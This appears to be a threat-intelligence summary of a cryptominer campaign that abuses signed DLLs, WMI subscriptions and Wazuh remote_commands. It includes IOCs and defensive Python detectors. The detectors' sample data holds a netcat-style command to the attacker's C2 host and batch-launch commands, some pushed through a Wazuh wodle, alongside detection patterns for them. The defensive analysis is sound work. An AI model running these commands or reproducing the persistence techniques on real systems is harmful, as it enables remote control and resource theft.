Scam Detection and Incident Management

A global campaign delivered a cryptominer via SEO-poisoned download sites, Telegram channels and YouTube links, using an MSI installer that unpacks an AutoIt-based A3X implant which persistently deploys an open-source miner. The attackers also abuse the Wazuh SIEM agent by enabling remote_commands to gain arbitrary remote execution, and hide the compiled AutoIt payload inside the Authenticode signature of a legitimately signed DLL so the file still passes signature checks. #Wazuh #SilentCryptoMiner

Keypoints

  • Attackers used SEO-poisoned websites, Telegram channels and YouTube descriptions/comments to distribute password-protected ZIP archives containing malicious MSI installers.
  • The MSI requires a password typed by the user (an anti-sandbox measure), then executes a VBScript CustomAction that runs BAT scripts to extract an encrypted archive and stage a one-shot autorun BAT; a forced reboot lets that BAT run as SYSTEM.
  • Malicious payloads are hidden inside legitimately signed DLLs: a compiled A3X script is stored in the DLL's Authenticode certificate table, a region the signature hash does not cover, so the file still verifies; a legitimate AutoIt interpreter is then pointed at the DLL and executes the embedded script.
  • The A3X implant embeds additional files (via FileInstall) and installs them to obscured, attribute-protected directories, then enforces strict ACLs (icacls) to prevent removal.
  • Persistence is achieved via WMI event subscriptions, periodic execution of netcat (masquerading as StartMenuExperienceHost.exe) to sportjump[.]ru, repeated nun.bat executions, Image File Execution Options debugger/monitor abuse, and registry persistence.
  • Variants install Wazuh with remote_commands enabled to allow arbitrary remote execution and telemetry harvesting; the final payload injects SilentCryptoMiner into explorer.exe to mine Monero/Zephyr and manipulate processes/clipboard.
  • The implant performs environment checks (anti-AV, sandbox/debugger), may capture screenshots or install browser extensions, and exfiltrates host info to a Telegram bot controlled by the attackers.

MITRE Techniques

  • [T1608.006] Stage Capabilities: SEO Poisoning – used to place malicious download sites in search results (‘advertising their websites in Yandex search results’).
  • [T1608.001] Stage Capabilities: Upload Malware – attackers hosted malicious ZIP/MSI installers on cloned or GitHub/raw pages (‘download a ZIP file being falsely advertised as popular software’).
  • [T1204.001] User Execution: Malicious Link – users were led to malicious resources via YouTube descriptions, comments and Telegram links (‘links to their resources and instructions on how to launch the malware’).
  • [T1204.002] User Execution: Malicious File – distribution relied on users running password-protected MSI installers inside ZIP archives (‘Inside the archive is an MSI file and a TXT file with a password required for installation’).
  • [T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT – attackers used a legitimate AutoIt interpreter to execute compiled A3X scripts embedded in DLLs (‘AutoIt interpreter has an interesting way of reading files…compiled scripts’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – BAT files and “start” commands are used throughout the chain to extract and launch components (‘the BAT file extracts the encrypted RAR archive and runs the “start” command’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – MSI CustomAction executed VBScript to start the BAT extraction chain (‘CustomAction field value of the MSI file is executed — this is effectively a VB script’).
  • [T1546.012] Event Triggered Execution: Image File Execution Options Injection – registry debugger/monitor keys are abused for persistence (‘abuses the registry keys “Image File Execution Options”, “Debugger” and “MonitorProcess”’).
  • [T1546.003] Event Triggered Execution: Windows Management Instrumentation Event Subscription – WMI filters and bindings are created to run commands on common events (‘creates filters which are activated by common events … executed using the __FilterToConsumerBinding class’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – periodic execution of netcat, nun.bat and other steps (‘Once every three minutes… once every five to ten minutes… once every fifteen minutes’); note that the report attributes the cadence to WMI event-filter polling intervals rather than schtasks, so this overlaps with T1546.003 above and applies cleanly only where a variant registers an actual scheduled task.
  • [T1055] Process Injection – final payload injects the miner into explorer.exe memory (‘injects into a newly created explorer.exe process memory an open-source miner’).
  • [T1562.001] Impair Defenses: Disable or Modify Tools – installers and instructions advise disabling antivirus/Windows Defender (‘attackers recommend disabling any installed antivirus and Windows Defender beforehand’).
  • [T1497] Virtualization/Sandbox Evasion – the MSI password and process checks stop execution in sandboxed or analysis environments (‘the MSI file asks for the password… one of the first countermeasures against sandbox analysis’; the implant also checks active processes).
  • [T1027.009] Obfuscated Files or Information: Embedded Payloads – A3X and other files embed additional payloads and installers inside compiled scripts/DLL signatures (‘the interpreter stores the files for installation right inside the compiled script’).
  • [T1027.010] Obfuscated Files or Information: Command Obfuscation – scripts and compiled components use obfuscation and embedding to hide actions (‘malicious A3X implant… deobfuscated code shows security process name check’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – netcat is renamed StartMenuExperienceHost.exe and signed DLLs are used to appear legitimate (‘netcat utility masked as StartMenuExperienceHost.exe’ and payload hidden in a legitimately signed dynamic library). The masquerade is by file name, not by file type, so T1036.005 rather than T1036.008 fits.
  • [T1564.001] Hide Artifacts: Hidden Files and Directories – installed directories are set system/hidden/read-only and use GUID-like names to hide in Explorer (‘directories containing the installed files have system, hidden and read-only attributes’ and use names like Classic.{GUID}).
  • [T1518.001] Software Discovery: Security Software Discovery – the implant collects installed AV/software info to decide on actions (‘collects… installed AV software’).
  • [T1033] System Owner/User Discovery – the implant gathers computer name and username (‘collects the following information: computer name, username’).
  • [T1082] System Information Discovery – OS version, architecture, CPU and GPU data are enumerated (‘OS version and architecture, CPU name, data about the GPU’).
  • [T1113] Screen Capture – some variants take screenshots of the desktop (‘some of the malware variants sending a screenshot of the user’s desktop’).
  • [T1496] Resource Hijacking – SilentCryptoMiner is used to mine cryptocurrencies on victims’ machines (‘injects… an open-source miner named SilentCryptoMiner’ to mine Monero/Zephyr).
  • [T1041] Exfiltration Over C2 Channel – collected host info is sent to a Telegram bot and C2 channels control the implant (‘sent to a special Telegram bot chat controlled by the attackers’ and netcat connects to sportjump[.]ru).

Indicators of Compromise

  • [Hashes] sample payloads and installers – b5b323679524d52e4c058b1a3dd8dee7, 4efa8ca01d7c566ff1b72f4ebf57cf2c, and 40+ other hashes listed in the report.
  • [Domains/URLs] distribution and C2 – sportjump[.]ru (C2/netcat), utorrent-client.github[.]io (malicious download), excel-ms.github[.]io/Windows/MS-Excel.zip, and multiple raw.githubusercontent and linktr[.]ee links.
  • [File names] installer and persistence files – StartMenuExperienceHost.exe (netcat masquerade), nun.bat, insta.bat, and MSI installers inside password-protected ZIPs.
  • [Paste/hosting links] staging and payload hosting – pastebin[.]com/raw/F87y7zJV, raw.githubusercontent[.]com/lidiyakamalova89/www/main/Ver.1.4.1.zip, and rentry[.]co/mi9fomgo/raw.

When focusing strictly on the technical procedure: the attackers deliver password-protected ZIP archives (containing an MSI and a TXT password) via SEO-poisoned sites, Telegram channels and YouTube links. The MSI demands a manually typed password to defeat automated sandbox analysis, runs a VBScript CustomAction which launches BAT scripts that extract an encrypted archive; those BATs add an autorun BAT to escalate to SYSTEM for a single execution and trigger a reboot. After reboot, the autorun BAT extracts two DLLs and runs the AutoIt interpreter with the DLL as an argument; a compiled A3X script is stored inside the Authenticode certificate table of a legitimately signed DLL, a region the signature hash does not cover, so the file remains verified while carrying the malicious payload.
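Signature verification alone will not catch this: Authenticode hashes the whole image except the certificate table, so `signtool verify` and `Get-AuthenticodeSignature` still report a valid signature. A hunting check therefore has to look at the table itself. The following Python is an added example, not code from the report or from the campaign: it parses the PE security directory, measures the DER-encoded PKCS#7 blob that legitimately lives there, and reports any trailing bytes, noting when they contain the AutoIt compiled-script marker. The marker bytes are those documented by public AutoIt script extractors, and the sample PE is a constructed header skeleton, not a real signed file.

```python
"""Detect data smuggled into a PE file's Authenticode certificate table.

Authenticode excludes the table pointed to by IMAGE_DIRECTORY_ENTRY_SECURITY
from its hash, so bytes appended inside it do not break verification.
"""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002
# AutoIt3 compiled-script header as documented by public AutoIt extractors:
# a 16-byte signature followed by the "AU3!EA06" version tag.
AU3_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D") + b"AU3!EA06"


def _der_total_length(blob: bytes) -> int:
    """Encoded size (tag + length + content) of the DER SEQUENCE at blob[0]."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate blob is not a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                       # short-form length
        return 2 + first
    n = first & 0x7F                       # long form: n length bytes follow
    if n == 0 or n > 4 or len(blob) < 2 + n:
        raise ValueError("malformed DER length")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def security_directory(pe: bytes) -> tuple:
    """(file offset, size) of the certificate table; (0, 0) when unsigned."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt_hdr = e_lfanew + 4 + 20                               # COFF header is 20 bytes
    magic = struct.unpack_from("<H", pe, opt_hdr)[0]
    data_dirs = opt_hdr + (112 if magic == 0x20B else 96)     # PE32+ vs PE32
    return struct.unpack_from("<II", pe, data_dirs + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)


def check_authenticode_overlay(pe: bytes) -> dict:
    """Walk the WIN_CERTIFICATE entries and account for every byte in the table."""
    off, size = security_directory(pe)
    result = {"signed": size > 0, "trailing_bytes": 0, "autoit_marker": False}
    end = off + size
    while off + 8 <= end:
        dw_length, _revision, cert_type = struct.unpack_from("<IHH", pe, off)
        if dw_length < 8:
            break                                              # corrupt entry
        body = pe[off + 8:off + dw_length]
        if cert_type == WIN_CERT_TYPE_PKCS_SIGNED_DATA:
            extra = body[_der_total_length(body):]
            # Up to seven zero bytes of 8-byte alignment padding is normal.
            if len(extra) > 7 or any(extra):
                result["trailing_bytes"] += len(extra)
                result["autoit_marker"] |= AU3_MAGIC in extra
        off += (dw_length + 7) & ~7                            # entries are 8-byte aligned
    return result


def build_sample_pe(signature_blob: bytes) -> bytes:
    """Constructed PE32+ header skeleton for exercising the parser (not loadable).

    signature_blob becomes the body of one WIN_CERTIFICATE entry; b"" means unsigned.
    """
    pe = bytearray(0x200)
    pe[:2] = b"MZ"
    struct.pack_into("<I", pe, 0x3C, 0x80)                     # e_lfanew
    pe[0x80:0x84] = b"PE\0\0"
    opt_hdr = 0x80 + 4 + 20
    struct.pack_into("<H", pe, opt_hdr, 0x20B)                 # PE32+ magic
    if not signature_blob:
        return bytes(pe)
    body = signature_blob + b"\0" * (-len(signature_blob) % 8)
    entry = struct.pack("<IHH", 8 + len(body), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + body
    struct.pack_into("<II", pe, opt_hdr + 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     len(pe), len(entry))
    return bytes(pe) + entry


# Constructed stand-in for a PKCS#7 SignedData blob: a 300-byte DER SEQUENCE.
SAMPLE_PKCS7 = b"\x30\x82\x01\x2c" + b"\xa0" * 300
```

Run `check_authenticode_overlay(open(path, "rb").read())` over DLLs dropped alongside an AutoIt interpreter; a signed file with a non-zero `trailing_bytes` deserves a closer look even when `autoit_marker` is false, since the payload could be any format the loader knows how to find. The check does not validate the signature chain, so pair it with the platform's own verification.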

The A3X implant contains embedded files (via FileInstall calls) that it drops to obscured ProgramData paths, sets system/hidden/read-only attributes, and locks ACLs using icacls to prevent removal. Persistence is established with WMI event subscriptions (filters and __FilterToConsumerBinding) configured to run netcat (masquerading as StartMenuExperienceHost.exe) to sportjump[.]ru, execute nun.bat copies, and run the “start” command at regular intervals; the implant also abuses Image File Execution Options (Debugger/MonitorProcess) and directly launches persistence BATs. The implant performs environment checks for debuggers/AV, optionally captures screenshots or installs malicious browser extensions, and exfiltrates host details to a Telegram bot.
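Because the persistence lives in WMI rather than in Run keys or scheduled tasks, a triage pass over root\subscription is the quickest way to find it. The Python below is an added example, not code from the report: it takes the three object classes an IR tool would export (__EventFilter, the __EventConsumer subclasses, __FilterToConsumerBinding), here simplified to dicts keyed by object Name instead of full WMI object paths, and applies the traits described above: short WITHIN polling intervals, command-line consumers that run cmd or batch files, and a binary called StartMenuExperienceHost.exe started from anywhere but its real SystemApps directory. The sample dump is constructed; the SCM filter/consumer pair in it ships with Windows, and the path, host and port in the netcat-style command are placeholders.

```python
"""Triage permanent WMI event subscriptions exported from root\\subscription."""
import re

# Directory of the genuine Start menu host on Windows 10/11 (lower-cased for matching).
LEGIT_SMEH_DIR = r"c:\windows\systemapps\microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy"
WITHIN_RE = re.compile(r"\bWITHIN\s+(\d+)", re.IGNORECASE)
BATCH_RE = re.compile(r"\.bat\b|\bcmd(?:\.exe)?\s+/[ck]\b", re.IGNORECASE)
SHORT_POLL_SECONDS = 900   # the report cites cadences of 3, 5-10 and 15 minutes


def polling_interval(query: str):
    """Seconds in the WQL WITHIN clause, or None for a non-polling filter."""
    m = WITHIN_RE.search(query)
    return int(m.group(1)) if m else None


def filter_reasons(query: str) -> list:
    interval = polling_interval(query)
    if interval is not None and interval <= SHORT_POLL_SECONDS:
        return [f"polls every {interval} s"]
    return []


def consumer_reasons(consumer: dict) -> list:
    reasons = []
    ctype = consumer.get("type", "")
    template = consumer.get("CommandLineTemplate") or ""
    low = template.lower()
    if ctype == "ActiveScriptEventConsumer":
        reasons.append("script consumer (VBScript/JScript runs as SYSTEM)")
    if ctype == "CommandLineEventConsumer":
        if "startmenuexperiencehost.exe" in low:
            if LEGIT_SMEH_DIR not in low:
                reasons.append("StartMenuExperienceHost.exe started outside SystemApps (masquerade)")
            else:
                reasons.append("StartMenuExperienceHost.exe launched by WMI (unusual)")
        if BATCH_RE.search(template):
            reasons.append("launches cmd/batch file")
    return reasons


def triage(filters: dict, consumers: dict, bindings: list) -> list:
    """One finding per suspicious binding, with the reasons attached."""
    findings = []
    for b in bindings:
        query = filters.get(b["Filter"])
        consumer = consumers.get(b["Consumer"])
        if query is None or consumer is None:
            reasons = ["binding references a missing filter or consumer"]
        else:
            reasons = filter_reasons(query) + consumer_reasons(consumer)
        if reasons:
            findings.append({"filter": b["Filter"], "consumer": b["Consumer"], "reasons": reasons})
    return findings


# Constructed sample dump. The SCM pair is a Windows default; the other two mimic
# the behaviour in the report with placeholder path, host and port.
SAMPLE_FILTERS = {
    "SCM Event Log Filter": "SELECT * FROM MSFT_SCMEventLogEvent",
    "PerfMonitor": "SELECT * FROM __InstanceModificationEvent WITHIN 180 "
                   "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",
    "TimeCheck": "SELECT * FROM __InstanceModificationEvent WITHIN 900 "
                 "WHERE TargetInstance ISA 'Win32_LocalTime'",
}
SAMPLE_CONSUMERS = {
    "SCM Event Log Consumer": {"type": "NTEventLogEventConsumer"},
    "NetConsumer": {"type": "CommandLineEventConsumer",
                    "CommandLineTemplate": r"C:\ProgramData\Sample\StartMenuExperienceHost.exe sportjump[.]ru 8080"},
    "BatConsumer": {"type": "CommandLineEventConsumer",
                    "CommandLineTemplate": r'cmd.exe /c start "" "C:\ProgramData\Sample\nun.bat"'},
}
SAMPLE_BINDINGS = [
    {"Filter": "SCM Event Log Filter", "Consumer": "SCM Event Log Consumer"},
    {"Filter": "PerfMonitor", "Consumer": "NetConsumer"},
    {"Filter": "TimeCheck", "Consumer": "BatConsumer"},
]


def run_sample() -> list:
    return triage(SAMPLE_FILTERS, SAMPLE_CONSUMERS, SAMPLE_BINDINGS)
```

On a live host the inputs come from `Get-CimInstance -Namespace root/subscription` for `__EventFilter`, `__EventConsumer` and `__FilterToConsumerBinding`; the binding's Filter and Consumer properties are object paths such as `__EventFilter.Name="PerfMonitor"`, so reduce them to the Name before feeding them in. Because the implant re-applies ACLs and re-runs nun.bat on a timer, remove the binding first, then the consumer and filter, then the files.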

The final stage uses a second pair of DLLs (AutoIt + signed DLL with embedded A3X) to inject SilentCryptoMiner into a newly created explorer.exe process, pointing it to an attacker-controlled mining configuration (wallet, algorithm such as Monero/Zephyr, and stealth/kill lists). Variants also install the Wazuh agent with remote_commands enabled to allow remote command execution and telemetry harvesting, giving attackers an additional remote-control and persistence channel.
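The Wazuh abuse hinges on two agent settings. The internal options `logcollector.remote_commands` and `wazuh_command.remote_commands` in local_internal_options.conf decide whether the agent will run `<command>` log sources and `command` wodles pushed by the manager through the shared agent.conf; commands placed in the agent's own ossec.conf run regardless. Whoever controls the manager the agent enrolls with can therefore push arbitrary commands that execute under the agent service account (SYSTEM on Windows). The Python below is an added example, not code from the report or from the Wazuh project: it audits those files, lists what will actually execute and which manager can push more. The sample configuration files are constructed; the manager address, the command strings and the paths are placeholders.

```python
"""Audit a Wazuh agent for remote command execution exposure."""
import xml.etree.ElementTree as ET

REMOTE_COMMAND_KEYS = ("logcollector.remote_commands", "wazuh_command.remote_commands")


def parse_internal_options(text: str) -> dict:
    """key=value lines with # comments, as in local_internal_options.conf."""
    opts = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if "=" in line:
            key, value = line.split("=", 1)
            opts[key.strip()] = value.strip()
    return opts


def parse_wazuh_xml(text: str) -> dict:
    """Command sources and manager addresses from ossec.conf / agent.conf.

    Wazuh files may hold several top-level <ossec_config> blocks, so the text is
    wrapped in a synthetic root before parsing.
    """
    root = ET.fromstring(f"<root>{text}</root>")
    commands = []
    for lf in root.iter("localfile"):
        fmt = (lf.findtext("log_format") or "").strip()
        if fmt in ("command", "full_command"):
            commands.append({"source": f"localfile/{fmt}",
                             "command": (lf.findtext("command") or "").strip(),
                             "frequency": (lf.findtext("frequency") or "").strip()})
    for wodle in root.iter("wodle"):
        if wodle.get("name") == "command" and (wodle.findtext("disabled") or "no").strip() != "yes":
            commands.append({"source": "wodle/command",
                             "command": (wodle.findtext("command") or "").strip(),
                             "frequency": (wodle.findtext("interval") or "").strip()})
    managers = [(s.findtext("address") or "").strip() for s in root.iter("server")]
    return {"commands": commands, "managers": [m for m in managers if m]}


def audit_agent(internal_options: str, ossec_conf: str, shared_agent_conf: str = "") -> dict:
    opts = parse_internal_options(internal_options)
    enabled = [k for k in REMOTE_COMMAND_KEYS if opts.get(k) == "1"]
    local = parse_wazuh_xml(ossec_conf)
    shared = parse_wazuh_xml(shared_agent_conf) if shared_agent_conf.strip() else {"commands": [], "managers": []}
    # Local commands always run; manager-pushed ones only when remote_commands is on.
    will_run = local["commands"] + (shared["commands"] if enabled else [])
    return {
        "remote_commands_enabled": enabled,
        "managers": local["managers"],
        "local_commands": local["commands"],
        "shared_commands": shared["commands"],
        "commands_that_will_run": will_run,
        # high: the manager operator has arbitrary execution under the agent account
        "risk": "high" if enabled else ("medium" if will_run else "low"),
    }


# Constructed sample files mirroring the abuse described in the report.
SAMPLE_INTERNAL_OPTIONS = """\
# constructed local_internal_options.conf
logcollector.remote_commands=1
wazuh_command.remote_commands=1
"""
SAMPLE_OSSEC_CONF = """\
<ossec_config>
  <client>
    <server>
      <address>manager.example.invalid</address>
      <port>1514</port>
      <protocol>tcp</protocol>
    </server>
  </client>
</ossec_config>
<ossec_config>
  <localfile>
    <log_format>full_command</log_format>
    <command>tasklist /v</command>
    <frequency>300</frequency>
  </localfile>
</ossec_config>
"""
SAMPLE_AGENT_CONF = """\
<agent_config>
  <wodle name="command">
    <disabled>no</disabled>
    <tag>update</tag>
    <command>cmd.exe /c start "" "C:\\ProgramData\\Sample\\nun.bat"</command>
    <interval>5m</interval>
    <run_on_start>yes</run_on_start>
  </wodle>
</agent_config>
"""


def audit_sample() -> dict:
    return audit_agent(SAMPLE_INTERNAL_OPTIONS, SAMPLE_OSSEC_CONF, SAMPLE_AGENT_CONF)
```

On a Windows agent the three files sit under the install directory (by default `C:\Program Files (x86)\ossec-agent\`: `ossec.conf`, `local_internal_options.conf` and `shared\agent.conf`). An agent you did not deploy, or one enrolled to a manager address you do not recognise, is the finding regardless of the risk level the audit returns; on a legitimate deployment, leave both remote_commands options at 0 unless the manager is trusted to run arbitrary commands on every endpoint.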

Read more: https://securelist.com/miner-campaign-misuses-open-source-siem-agent/114022/